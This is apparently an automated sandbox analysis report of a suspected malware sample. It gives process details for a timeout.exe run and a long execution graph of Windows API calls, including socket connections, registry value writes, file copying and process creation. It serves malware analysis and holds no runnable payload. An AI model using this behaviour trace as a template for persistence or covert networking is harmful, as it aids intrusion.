                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 30 /nobreak
                                                                          Imagebase:0xa50000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:3.9%
                                                                            Dynamic/Decrypted Code Coverage:17.9%
                                                                            Signature Coverage:25.6%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:70
                                                                            execution_graph 126439 10002d80 ResetEvent InterlockedExchange timeGetTime socket 126440 10002de8 126439->126440 126441 10002dfc lstrlenW WideCharToMultiByte 126439->126441 126493 10006815 126440->126493 126460 100067ff 126441->126460 126444 10002df6 126446 10002e59 collate 126447 10002e60 htons connect 126446->126447 126448 10002e96 126446->126448 126447->126448 126449 10002eab setsockopt setsockopt setsockopt setsockopt 126447->126449 126450 10006815 __crtGetStringTypeA_stat 5 API calls 126448->126450 126452 10002f52 InterlockedExchange 126449->126452 126453 10002f24 WSAIoctl 126449->126453 126451 10002ea5 126450->126451 126472 1000721b 126452->126472 126453->126452 126456 1000721b 748 API calls 126457 10002f91 126456->126457 126458 10006815 __crtGetStringTypeA_stat 5 API calls 126457->126458 126459 10002fa6 126458->126459 126462 10006f17 126460->126462 126463 10002e22 lstrlenW WideCharToMultiByte gethostbyname 126462->126463 126467 10006f3d std::exception::exception 126462->126467 126501 10006e83 126462->126501 126518 10008550 DecodePointer 126462->126518 126463->126446 126465 10006f7b 126520 10006e24 66 API calls std::exception::operator= 126465->126520 126467->126465 126519 100073e9 76 API calls __cinit 126467->126519 126468 10006f85 126521 10007836 RaiseException 126468->126521 126471 10006f96 126473 1000722b 126472->126473 126474 1000723f 126472->126474 126557 1000710d 66 API calls __getptd_noexit 126473->126557 126530 10009754 TlsGetValue 126474->126530 126477 10007230 126558 10008702 11 API calls __cftoe_l 126477->126558 126482 100072a2 126559 10006e49 66 API calls 2 library calls 126482->126559 126485 100072a8 126487 10002f79 126485->126487 126560 10007133 66 API calls 3 library calls 126485->126560 126487->126456 126490 10007267 CreateThread 126490->126487 126492 1000729a GetLastError 126490->126492 126618 100071b6 126490->126618 126492->126482 126494 1000681d 126493->126494 126495 1000681f IsDebuggerPresent 126493->126495 126494->126444 127041 1000b5e6 126495->127041 126498 1000794f SetUnhandledExceptionFilter UnhandledExceptionFilter 126499 10007974 GetCurrentProcess TerminateProcess 126498->126499 126500 1000796c __call_reportfault 126498->126500 126499->126444 126500->126499 126502 10006f00 126501->126502 126505 10006e91 126501->126505 126528 10008550 DecodePointer 126502->126528 126504 10006f06 126529 1000710d 66 API calls __getptd_noexit 126504->126529 126508 10006ebf RtlAllocateHeap 126505->126508 126510 10006e9c 126505->126510 126512 10006eec 126505->126512 126516 10006eea 126505->126516 126525 10008550 DecodePointer 126505->126525 126508->126505 126509 10006ef8 126508->126509 126509->126462 126510->126505 126522 10008508 66 API calls 2 library calls 126510->126522 126523 10008359 66 API calls 7 library calls 126510->126523 126524 10008098 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 126510->126524 126526 1000710d 66 API calls __getptd_noexit 126512->126526 126527 1000710d 66 API calls __getptd_noexit 126516->126527 126518->126462 126519->126465 126520->126468 126521->126471 126522->126510 126523->126510 126525->126505 126526->126516 126527->126509 126528->126504 126529->126509 126531 10007245 126530->126531 126532 10009769 DecodePointer TlsSetValue 126530->126532 126533 10009fe4 126531->126533 126532->126531 126535 10009fed 126533->126535 126536 10007251 126535->126536 126537 1000a00b Sleep 126535->126537 126561 1000e555 126535->126561 126536->126482 126539 1000990f 126536->126539 126538 1000a020 126537->126538 126538->126535 126538->126536 126572 10009896 GetLastError 126539->126572 126541 10009917 126542 1000725e 126541->126542 126586 10008315 66 API calls 3 library calls 126541->126586 126544 100097e2 126542->126544 126588 10009db0 126544->126588 126546 100097ee GetModuleHandleW 126589 1000c144 126546->126589 126548 1000982c InterlockedIncrement 126596 10009884 126548->126596 126551 1000c144 __lock 64 API calls 126552 1000984d 126551->126552 126599 1000de7f InterlockedIncrement 126552->126599 126554 1000986b 126611 1000988d 126554->126611 126556 10009878 _doexit 126556->126490 126557->126477 126558->126487 126559->126485 126560->126487 126562 1000e561 126561->126562 126568 1000e57c 126561->126568 126563 1000e56d 126562->126563 126562->126568 126570 1000710d 66 API calls __getptd_noexit 126563->126570 126564 1000e58f RtlAllocateHeap 126564->126568 126566 1000e572 126566->126535 126568->126564 126569 1000e5b6 126568->126569 126571 10008550 DecodePointer 126568->126571 126569->126535 126570->126566 126571->126568 126573 10009754 ___set_flsgetvalue 3 API calls 126572->126573 126575 100098ad 126573->126575 126574 10009903 SetLastError 126574->126541 126575->126574 126576 10009fe4 __calloc_crt 62 API calls 126575->126576 126577 100098c1 126576->126577 126577->126574 126578 100098c9 DecodePointer 126577->126578 126579 100098de 126578->126579 126580 100098e2 126579->126580 126581 100098fa 126579->126581 126582 100097e2 __CRT_INIT@12 62 API calls 126580->126582 126587 10006e49 66 API calls 2 library calls 126581->126587 126584 100098ea GetCurrentThreadId 126582->126584 126584->126574 126585 10009900 126585->126574 126587->126585 126588->126546 126590 1000c159 126589->126590 126591 1000c16c EnterCriticalSection 126589->126591 126614 1000c082 66 API calls 8 library calls 126590->126614 126591->126548 126593 1000c15f 126593->126591 126615 10008315 66 API calls 3 library calls 126593->126615 126616 1000c06b LeaveCriticalSection 126596->126616 126598 10009846 126598->126551 126600 1000dea0 126599->126600 126601 1000de9d InterlockedIncrement 126599->126601 126602 1000deaa InterlockedIncrement 126600->126602 126603 1000dead 126600->126603 126601->126600 126602->126603 126604 1000deb7 InterlockedIncrement 126603->126604 126605 1000deba 126603->126605 126604->126605 126606 1000dec4 InterlockedIncrement 126605->126606 126607 1000dec7 126605->126607 126606->126607 126608 1000dee0 InterlockedIncrement 126607->126608 126609 1000def0 InterlockedIncrement 126607->126609 126610 1000defb InterlockedIncrement 126607->126610 126608->126607 126609->126607 126610->126554 126617 1000c06b LeaveCriticalSection 126611->126617 126613 10009894 126613->126556 126614->126593 126616->126598 126617->126613 126619 10009754 ___set_flsgetvalue 3 API calls 126618->126619 126620 100071c1 126619->126620 126633 10009734 TlsGetValue 126620->126633 126623 100071d0 126684 10009788 DecodePointer 126623->126684 126624 100071fa 126635 10009929 126624->126635 126626 10007215 126671 10007175 126626->126671 126629 100071df 126631 100071f0 GetCurrentThreadId 126629->126631 126632 100071e3 GetLastError ExitThread 126629->126632 126631->126626 126634 100071cc 126633->126634 126634->126623 126634->126624 126637 10009935 _doexit 126635->126637 126636 10009a37 _doexit 126636->126626 126637->126636 126638 1000994d 126637->126638 126685 10006e49 66 API calls 2 library calls 126637->126685 126640 1000995b 126638->126640 126686 10006e49 66 API calls 2 library calls 126638->126686 126642 10009969 126640->126642 126687 10006e49 66 API calls 2 library calls 126640->126687 126643 10009977 126642->126643 126688 10006e49 66 API calls 2 library calls 126642->126688 126646 10009985 126643->126646 126689 10006e49 66 API calls 2 library calls 126643->126689 126648 10009993 126646->126648 126690 10006e49 66 API calls 2 library calls 126646->126690 126650 100099a1 126648->126650 126691 10006e49 66 API calls 2 library calls 126648->126691 126651 100099b2 126650->126651 126692 10006e49 66 API calls 2 library calls 126650->126692 126654 1000c144 __lock 66 API calls 126651->126654 126672 10007181 _doexit 126671->126672 126673 1000990f __getptd 66 API calls 126672->126673 126674 10007186 126673->126674 126699 100030c0 126674->126699 126704 10002fb0 126674->126704 126714 100052b0 126674->126714 126725 100052d9 126674->126725 126675 10007190 126684->126629 126685->126638 126686->126640 126687->126642 126688->126643 126689->126646 126690->126648 126691->126650 126692->126651 126700 10003128 126699->126700 126702 100030d4 126699->126702 126700->126675 126701 100030e8 Sleep 126701->126702 126702->126700 126702->126701 126703 10003104 timeGetTime 126702->126703 126703->126702 126705 100067ff 77 API calls 126704->126705 126706 10002fd3 126705->126706 126715 1000536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 126714->126715 126722 100052cc 126714->126722 126716 100053ca 126715->126716 126717 1000543c 126715->126717 126722->126715 126729 100052d2 126725->126729 126726 1000536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 126729->126726 127041->126498 127042 10003200 Sleep 127043 10020254 127042->127043 127044 6c6e072c 127049 6c7eb3db 127044->127049 127055 6c7ea910 127049->127055 127051 6c6e0736 127052 6c6e1262 127051->127052 127147 6c6e1277 127052->127147 127056 6c7ea91c __EH_prolog3 127055->127056 127065 6c75fac2 127056->127065 127060 6c7ea954 127061 6c7ea95d GetProfileIntW GetProfileIntW 127060->127061 127062 6c7ea995 127060->127062 127061->127062 127079 6c80e6a6 127062->127079 127064 6c7ea99c Concurrency::details::ExternalContextBase::~ExternalContextBase 127064->127051 127084 6c75c8b9 127065->127084 127068 6c80e632 127069 6c80e6a0 127068->127069 127070 6c80e63e 127068->127070 127145 6c75e7dc RaiseException CallUnexpected 127069->127145 127071 6c80e64c 127070->127071 127144 6c80e6ca InitializeCriticalSection 127070->127144 127074 6c80e65c EnterCriticalSection 127071->127074 127075 6c80e68e EnterCriticalSection 127071->127075 127077 6c80e673 InitializeCriticalSection 127074->127077 127078 6c80e686 LeaveCriticalSection 127074->127078 127075->127060 127077->127078 127078->127075 127080 6c80e6b1 LeaveCriticalSection 127079->127080 127081 6c80e6c4 127079->127081 127080->127064 127146 6c75e7dc RaiseException CallUnexpected 127081->127146 127089 6c7a170b 127084->127089 127086 6c75c8c8 127088 6c75c8e2 127086->127088 127104 6c7a17ce 7 API calls 2 library calls 127086->127104 127088->127068 127092 6c7a1717 __EH_prolog3 127089->127092 127090 6c7a1790 127136 6c75e7dc RaiseException CallUnexpected 127090->127136 127091 6c7a1758 127127 6c7a1687 EnterCriticalSection 127091->127127 127092->127090 127092->127091 127094 6c7a173e 127092->127094 127134 6c7a134e TlsAlloc InitializeCriticalSection RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 127092->127134 127094->127090 127105 6c7a138e EnterCriticalSection 127094->127105 127100 6c7a1752 127100->127090 127100->127091 127101 6c7a176a 127135 6c7a1555 48 API calls 3 library calls 127101->127135 127102 6c7a1786 Concurrency::details::ExternalContextBase::~ExternalContextBase 127102->127086 127104->127088 127108 6c7a13b2 127105->127108 127106 6c7a14c5 LeaveCriticalSection 127142 6c75e7a8 RaiseException CallUnexpected 127106->127142 127108->127106 127110 6c7a1419 GlobalHandle 127108->127110 127111 6c7a1404 127108->127111 127125 6c7a1462 __fread_nolock 127108->127125 127109 6c7a1492 LeaveCriticalSection 127109->127100 127114 6c7a142c GlobalUnlock 127110->127114 127115 6c7a14ad 127110->127115 127137 6c6f589a 127111->127137 127119 6c6f589a Concurrency::details::ExternalContextBase::~ExternalContextBase 40 API calls 127114->127119 127115->127106 127117 6c7a14b2 GlobalHandle 127115->127117 127117->127106 127120 6c7a14be GlobalLock 127117->127120 127123 6c7a1442 GlobalReAlloc 127119->127123 127120->127106 127121 6c7a144e 127121->127115 127124 6c7a1452 GlobalLock 127121->127124 127123->127121 127124->127106 127124->127125 127125->127109 127128 6c7a16cb LeaveCriticalSection 127127->127128 127129 6c7a16a0 127127->127129 127131 6c7a16d4 127128->127131 127129->127128 127130 6c7a16a5 TlsGetValue 127129->127130 127130->127128 127132 6c7a16b1 127130->127132 127131->127101 127131->127102 127132->127128 127133 6c7a16bd LeaveCriticalSection 127132->127133 127133->127131 127134->127094 127135->127102 127138 6c6f58ad Concurrency::details::ExternalContextBase::~ExternalContextBase 127137->127138 127139 6c6f58b4 GlobalAlloc 127138->127139 127143 6c6b287a 40 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 127138->127143 127139->127121 127141 6c6f58bf 127143->127141 127144->127071 127148 6c6e128d 127147->127148 127149 6c6e1286 127147->127149 127154 6c85a277 32 API calls 127148->127154 127153 6c85a2e8 32 API calls 127149->127153 127152 6c6e0740 127153->127152 127154->127152 127155 1000638b 127156 10001100 70 API calls 127155->127156 127157 10006390 127156->127157 127158 1000474c lstrlenW 127159 1001fff8 127158->127159 127160 6c6ba265 127161 6c6ba26d 127160->127161 127297 6c6c2098 127161->127297 127163 6c6bbd90 127342 6c85c237 127163->127342 127165 6c6bbd9a 127347 6c6b9714 127165->127347 127169 6c6bbda9 127170 6c6b9714 30 API calls 127169->127170 127171 6c6bbdb8 127170->127171 127172 6c6b9714 30 API calls 127171->127172 127173 6c6bbdc7 127172->127173 127178 6c6b9714 30 API calls 127173->127178 127174 6c6bbdfe 127177 6c6b9714 30 API calls 127174->127177 127175 6c6bac87 _Yarn _strlen 127175->127165 127175->127174 127176 6c6baddf 127175->127176 127184 6c6bbd0a 127175->127184 127210 6c6badef std::ios_base::_Ios_base_dtor _Yarn _strlen 127175->127210 127325 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 127176->127325 127180 6c6bbe0d 127177->127180 127181 6c6bbdd6 127178->127181 127182 6c6b9714 30 API calls 127180->127182 127183 6c6b9714 30 API calls 127181->127183 127185 6c6bbe1c 127182->127185 127186 6c6bbddb 127183->127186 127187 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 127184->127187 127189 6c6b9714 30 API calls 127185->127189 127188 6c6b9714 30 API calls 127186->127188 127187->127210 127190 6c6bbde0 127188->127190 127191 6c6bbe2b 127189->127191 127192 6c6b9714 30 API calls 127190->127192 127193 6c6b9714 30 API calls 127191->127193 127194 6c6bbdef 127192->127194 127195 6c6bbe3a 127193->127195 127196 6c6b9714 30 API calls 127194->127196 127197 6c6b9714 30 API calls 127195->127197 127196->127174 127198 6c6bbe49 127197->127198 127199 6c6b9714 30 API calls 127198->127199 127200 6c6bbe58 127199->127200 127201 6c6b9714 30 API calls 127200->127201 127202 6c6bbe67 127201->127202 127355 6c6bc08c 127202->127355 127203 6c6ba3ef std::ios_base::_Ios_base_dtor _strlen 127203->127163 127203->127175 127203->127181 127205 6c6ba56c 127203->127205 127206 6c6ba577 127203->127206 127215 6c6ba528 _Yarn 127203->127215 127309 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 127205->127309 127310 6c6e1139 127206->127310 127207 6c6bbe82 127210->127163 127210->127169 127211 6c6bb00d 127210->127211 127212 6c6bb002 127210->127212 127218 6c6bafb4 _Yarn 127210->127218 127213 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 127211->127213 127326 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 127212->127326 127213->127218 127215->127195 127216 6c6ba632 127215->127216 127220 6c6bbd60 127215->127220 127232 6c6ba642 std::ios_base::_Ios_base_dtor _Yarn _strlen 127215->127232 127321 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 127216->127321 127218->127180 127219 6c6bb08d 127218->127219 127223 6c6bbc9d 127218->127223 127226 6c6bb09d std::ios_base::_Ios_base_dtor _Yarn 127218->127226 127327 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 127219->127327 127222 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 127220->127222 127222->127232 127224 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 127223->127224 127224->127226 127225 6c6bb20a CopyFileA 127227 6c6bb218 _strlen 127225->127227 127226->127163 127226->127225 127227->127171 127228 6c6bb2e8 127227->127228 127229 6c6bb2dd 127227->127229 127233 6c6bb286 _Yarn 127227->127233 127231 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 127228->127231 127328 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 127229->127328 127231->127233 127232->127163 127232->127186 127236 6c6ba8c8 127232->127236 127237 6c6ba8d3 127232->127237 127244 6c6ba87b _Yarn 127232->127244 127233->127185 127234 6c6bb34c 127233->127234 127239 6c6bbd18 127233->127239 127243 6c6bb358 std::ios_base::_Ios_base_dtor _Yarn 127233->127243 127329 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 127234->127329 127322 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 127236->127322 127240 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 127237->127240 127241 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 127239->127241 127240->127244 127241->127243 127242 6c6bb4ef CopyFileA 127247 6c6bb4fd _strlen 127242->127247 127243->127163 127243->127242 127244->127198 127245 6c6ba97f 127244->127245 127248 6c6bbd78 127244->127248 127288 6c6ba98f std::ios_base::_Ios_base_dtor _Yarn 127244->127288 127323 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 127245->127323 127247->127173 127249 6c6bb5f8 127247->127249 127250 6c6bb5ed 127247->127250 127255 6c6bb59f _Yarn 127247->127255 127253 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 127248->127253 127252 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 127249->127252 127330 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 127250->127330 127252->127255 127253->127288 127254 6c6bb676 127331 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 127254->127331 127255->127191 127255->127254 127257 6c6bbcc3 127255->127257 127260 6c6bb686 std::ios_base::_Ios_base_dtor _Yarn 127255->127260 127259 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 127257->127259 127259->127260 127260->127163 127303 6c6c4700 127260->127303 127261 6c6bb888 CreateProcessA 127263 6c6bbbd6 127261->127263 127269 6c6bb8cc _strlen 127261->127269 127340 6c6bc894 72 API calls std::ios_base::_Ios_base_dtor 127263->127340 127264 6c6bb7f9 std::ios_base::_Ios_base_dtor 127264->127163 127264->127261 127332 6c6c4a00 17 API calls 127264->127332 127265 6c6bb868 127333 6c6bc572 72 API calls 127265->127333 127268 6c6bb870 127268->127261 127270 6c6bb877 127268->127270 127269->127190 127274 6c6bb950 127269->127274 127275 6c6bb945 127269->127275 127282 6c6bb8f7 _Yarn 127269->127282 127334 6c6ba07c OpenProcess CloseHandle 127270->127334 127273 6c6bbbde std::ios_base::_Ios_base_dtor 127273->127163 127280 6c6bbc55 std::ios_base::_Ios_base_dtor 127273->127280 127276 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 127274->127276 127335 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 127275->127335 127276->127282 127277 6c6bbc71 127278 6c6bb87d 127278->127261 127278->127263 127341 6c6bc810 72 API calls std::ios_base::_Ios_base_dtor 127280->127341 127281 6c6bb9ce 127336 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 127281->127336 127282->127200 127282->127281 127284 6c6bbd3e 127282->127284 127291 6c6bb9de std::ios_base::_Ios_base_dtor _Yarn 127282->127291 127286 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 127284->127286 127285 6c6c2098 98 API calls 127287 6c6bbb4d 127285->127287 127286->127291 127287->127163 127289 6c6bbb74 std::ios_base::_Ios_base_dtor 127287->127289 127290 6c6bbbb5 CloseHandle CloseHandle 127287->127290 127288->127163 127324 6c6bc394 72 API calls 127288->127324 127289->127287 127337 6c6bc656 17 API calls 127289->127337 127339 6c6bc810 72 API calls std::ios_base::_Ios_base_dtor 127290->127339 127291->127163 127291->127285 127295 6c6bbbaa 127338 6c6bc394 72 API calls 127295->127338 127298 6c6c2108 127297->127298 127360 6c6c22ce 127298->127360 127302 6c6c2177 127302->127203 127304 6c6c4732 127303->127304 127305 6c6c22ce 44 API calls 127304->127305 127306 6c6c47c1 127305->127306 127307 6c6c239a 96 API calls 127306->127307 127308 6c6c47df 127307->127308 127308->127264 127309->127215 127311 6c6e113e ___std_exception_copy 127310->127311 127312 6c6e1158 127311->127312 127314 6c6e115a 127311->127314 127861 6c859b6b EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 127311->127861 127312->127215 127315 6c7a01c8 Concurrency::details::ExternalContextBase::~ExternalContextBase 127314->127315 127316 6c6e1164 Concurrency::cancel_current_task 127314->127316 127863 6c84c646 RaiseException 127315->127863 127862 6c84c646 RaiseException 127316->127862 127318 6c7a01e4 127320 6c79f61e 127321->127232 127322->127244 127323->127288 127324->127175 127325->127210 127326->127218 127327->127226 127328->127233 127329->127243 127330->127255 127331->127260 127332->127265 127333->127268 127334->127278 127335->127282 127336->127291 127337->127295 127338->127290 127339->127263 127340->127273 127341->127277 127864 6c85c476 29 API calls swprintf 127342->127864 127344 6c85c246 127865 6c85c254 11 API calls _unexpected 127344->127865 127346 6c85c253 127348 6c6b971e 127347->127348 127866 6c79f61f 30 API calls 2 library calls 127347->127866 127350 6c6b9727 127348->127350 127351 6c6b9746 127348->127351 127353 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 127350->127353 127867 6c6b974b 30 API calls 2 library calls 127351->127867 127354 6c6b9730 127353->127354 127354->127169 127356 6c6bc099 127355->127356 127357 6c6bc0bf std::ios_base::_Ios_base_dtor 127355->127357 127356->127357 127358 6c85c237 29 API calls 127356->127358 127357->127207 127359 6c6bc0ea _strlen 127358->127359 127359->127207 127371 6c6c3d78 127360->127371 127363 6c6c239a 127364 6c6c23e5 127363->127364 127370 6c6c23d0 127363->127370 127408 6c79f4f1 127364->127408 127368 6c6c2404 127417 6c6c11ee 17 API calls 2 library calls 127368->127417 127370->127302 127372 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 127371->127372 127373 6c6c3dc3 127372->127373 127376 6c79f3d1 127373->127376 127375 6c6c2159 127375->127363 127377 6c79f3dd __EH_prolog3 127376->127377 127388 6c79ef60 127377->127388 127382 6c79f3fb 127402 6c79f464 41 API calls std::locale::_Setgloballocale 127382->127402 127383 6c79f456 Concurrency::details::ExternalContextBase::~ExternalContextBase 127383->127375 127385 6c79f403 127403 6c79f25b 14 API calls 3 library calls 127385->127403 127387 6c79f419 127394 6c79ef91 127387->127394 127389 6c79ef6f 127388->127389 127390 6c79ef76 127388->127390 127404 6c85c967 6 API calls std::_Lockit::_Lockit 127389->127404 127391 6c79ef74 127390->127391 127405 6c82e866 EnterCriticalSection 127390->127405 127391->127387 127401 6c79f2da 15 API calls 2 library calls 127391->127401 127395 6c85c975 127394->127395 127396 6c79ef9b 127394->127396 127407 6c85c950 LeaveCriticalSection 127395->127407 127400 6c79efae 127396->127400 127406 6c82e874 LeaveCriticalSection 127396->127406 127399 6c85c97c 127399->127383 127400->127383 127401->127382 127402->127385 127403->127387 127404->127391 127405->127391 127406->127400 127407->127399 127409 6c79f4fa 127408->127409 127411 6c6c23f3 127409->127411 127418 6c85b491 127409->127418 127411->127370 127416 6c6c0244 29 API calls 127411->127416 127414 6c79f569 127414->127411 127441 6c85ed83 127414->127441 127416->127368 127417->127370 127419 6c85b49c ___scrt_is_nonwritable_in_current_image 127418->127419 127420 6c85b4af 127419->127420 127423 6c85b4cf 127419->127423 127459 6c84f976 14 API calls ___free_lconv_mon 127420->127459 127422 6c85b4b4 127460 6c85c227 29 API calls ___crtDownlevelLCIDToLocaleName 127422->127460 127425 6c85b4d4 127423->127425 127426 6c85b4e1 127423->127426 127461 6c84f976 14 API calls ___free_lconv_mon 127425->127461 127445 6c869e28 127426->127445 127428 6c79f54e 127428->127411 127437 6c85b134 127428->127437 127431 6c85b4f1 127462 6c84f976 14 API calls ___free_lconv_mon 127431->127462 127432 6c85b4fe 127453 6c86a1f2 127432->127453 127438 6c85b147 swprintf 127437->127438 127668 6c85b3e7 127438->127668 127440 6c85b15c swprintf 127440->127414 127442 6c85ed96 swprintf 127441->127442 127796 6c85ee41 127442->127796 127444 6c85eda2 swprintf 127444->127411 127446 6c869e34 ___scrt_is_nonwritable_in_current_image 127445->127446 127464 6c85c939 EnterCriticalSection 127446->127464 127448 6c869e42 127465 6c869ecc 127448->127465 127454 6c86a1fd 127453->127454 127502 6c85aee3 127454->127502 127458 6c85b513 127463 6c85b53c LeaveCriticalSection __fread_nolock 127458->127463 127459->127422 127460->127428 127461->127428 127462->127428 127463->127428 127464->127448 127474 6c869eef 127465->127474 127466 6c869e4f 127478 6c869e88 127466->127478 127467 6c869f47 127483 6c866b28 127467->127483 127474->127466 127474->127467 127481 6c84f83a EnterCriticalSection 127474->127481 127482 6c84f84e LeaveCriticalSection 127474->127482 127475 6c869f78 127497 6c84f83a EnterCriticalSection 127475->127497 127501 6c85c950 LeaveCriticalSection 127478->127501 127480 6c85b4ea 127480->127431 127480->127432 127481->127474 127482->127474 127488 6c866b35 __Getctype 127483->127488 127484 6c866b75 127499 6c84f976 14 API calls ___free_lconv_mon 127484->127499 127485 6c866b60 RtlAllocateHeap 127486 6c866b73 127485->127486 127485->127488 127490 6c8637d7 127486->127490 127488->127484 127488->127485 127498 6c859b6b EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 127488->127498 127491 6c8637e2 RtlFreeHeap 127490->127491 127492 6c86380c 127490->127492 127491->127492 127493 6c8637f7 GetLastError 127491->127493 127492->127466 127496 6c865a87 6 API calls std::_Lockit::_Lockit 127492->127496 127494 6c863804 ___free_lconv_mon 127493->127494 127500 6c84f976 14 API calls ___free_lconv_mon 127494->127500 127496->127475 127497->127466 127498->127488 127499->127486 127500->127492 127501->127480 127503 6c85af02 127502->127503 127504 6c85af15 127503->127504 127512 6c85af2a 127503->127512 127522 6c84f976 14 API calls ___free_lconv_mon 127504->127522 127506 6c85af1a 127523 6c85c227 29 API calls ___crtDownlevelLCIDToLocaleName 127506->127523 127508 6c85af25 127508->127458 127519 6c8730b0 127508->127519 127510 6c85b0fb 127528 6c85c227 29 API calls ___crtDownlevelLCIDToLocaleName 127510->127528 127517 6c85b04a 127512->127517 127524 6c85d137 39 API calls 2 library calls 127512->127524 127514 6c85b09a 127514->127517 127525 6c85d137 39 API calls 2 library calls 127514->127525 127516 6c85b0b8 127516->127517 127526 6c85d137 39 API calls 2 library calls 127516->127526 127517->127508 127527 6c84f976 14 API calls ___free_lconv_mon 127517->127527 127529 6c873468 127519->127529 127522->127506 127523->127508 127524->127514 127525->127516 127526->127517 127527->127510 127528->127508 127532 6c873474 ___scrt_is_nonwritable_in_current_image 127529->127532 127530 6c87347b 127549 6c84f976 14 API calls ___free_lconv_mon 127530->127549 127532->127530 127534 6c8734a6 127532->127534 127533 6c873480 127550 6c85c227 29 API calls ___crtDownlevelLCIDToLocaleName 127533->127550 127540 6c8730d0 127534->127540 127539 6c8730cb 127539->127458 127552 6c8606e8 127540->127552 127545 6c873106 127547 6c873138 127545->127547 127548 6c8637d7 ___free_lconv_mon 14 API calls 127545->127548 127551 6c8734fd LeaveCriticalSection __wsopen_s 127547->127551 127548->127547 127549->127533 127550->127539 127551->127539 127600 6c84ee48 127552->127600 127556 6c86070c 127557 6c84ef42 127556->127557 127609 6c84efb7 127557->127609 127560 6c87313e 127626 6c8735d8 127560->127626 127601 6c84ee66 127600->127601 127602 6c84ee5f 127600->127602 127601->127602 127603 6c863a63 __Getctype 39 API calls 127601->127603 127602->127556 127608 6c86583d 5 API calls std::_Lockit::_Lockit 127602->127608 127604 6c84ee87 127603->127604 127605 6c864072 __Getctype 39 API calls 127604->127605 127606 6c84ee9d 127605->127606 127607 6c86409f __wsopen_s 39 API calls 127606->127607 127607->127602 127608->127556 127610 6c84efc5 127609->127610 127611 6c84efdf 127609->127611 127612 6c84ef28 __wsopen_s 14 API calls 127610->127612 127613 6c84f005 127611->127613 127614 6c84efe6 127611->127614 127619 6c84ef5a 127612->127619 127615 6c86385f __wsopen_s MultiByteToWideChar 127613->127615 127616 6c84eee9 __wsopen_s 15 API calls 127614->127616 127614->127619 127617 6c84f014 127615->127617 127616->127619 127618 6c84f01b GetLastError 127617->127618 127621 6c84f041 127617->127621 127622 6c84eee9 __wsopen_s 15 API calls 127617->127622 127620 6c84f027 127618->127620 127619->127545 127619->127560 127624 6c84f976 ___free_lconv_mon 14 API calls 127620->127624 127621->127619 127623 6c86385f __wsopen_s MultiByteToWideChar 127621->127623 127622->127621 127625 6c84f058 127623->127625 127624->127619 127625->127618 127625->127619 127627 6c8735f9 127626->127627 127632 6c873613 127626->127632 127629 6c84f976 ___free_lconv_mon 14 API calls 127627->127629 127627->127632 127628 6c873568 __wsopen_s 29 API calls 127632->127628 127670 6c85b3f3 ___scrt_is_nonwritable_in_current_image 127668->127670 127669 6c85b3f9 127691 6c85c3d0 29 API calls 2 library calls 127669->127691 127670->127669 127672 6c85b43c 127670->127672 127679 6c84f83a EnterCriticalSection 127672->127679 127674 6c85b448 127680 6c85b2fb 127674->127680 127676 6c85b45e 127692 6c85b487 LeaveCriticalSection __fread_nolock 127676->127692 127678 6c85b414 127678->127440 127679->127674 127681 6c85b321 127680->127681 127682 6c85b30e 127680->127682 127693 6c85b222 127681->127693 127682->127676 127684 6c85b344 127687 6c85b35f 127684->127687 127690 6c85b3d2 127684->127690 127706 6c85fa9b 34 API calls 3 library calls 127684->127706 127697 6c85ef99 127687->127697 127690->127676 127691->127678 127692->127678 127694 6c85b233 127693->127694 127696 6c85b28b 127693->127696 127694->127696 127707 6c869fce 31 API calls 2 library calls 127694->127707 127696->127684 127698 6c85b372 127697->127698 127699 6c85efb2 127697->127699 127703 6c86a00e 127698->127703 127699->127698 127708 6c85b10d 127699->127708 127701 6c85efce 127715 6c86c026 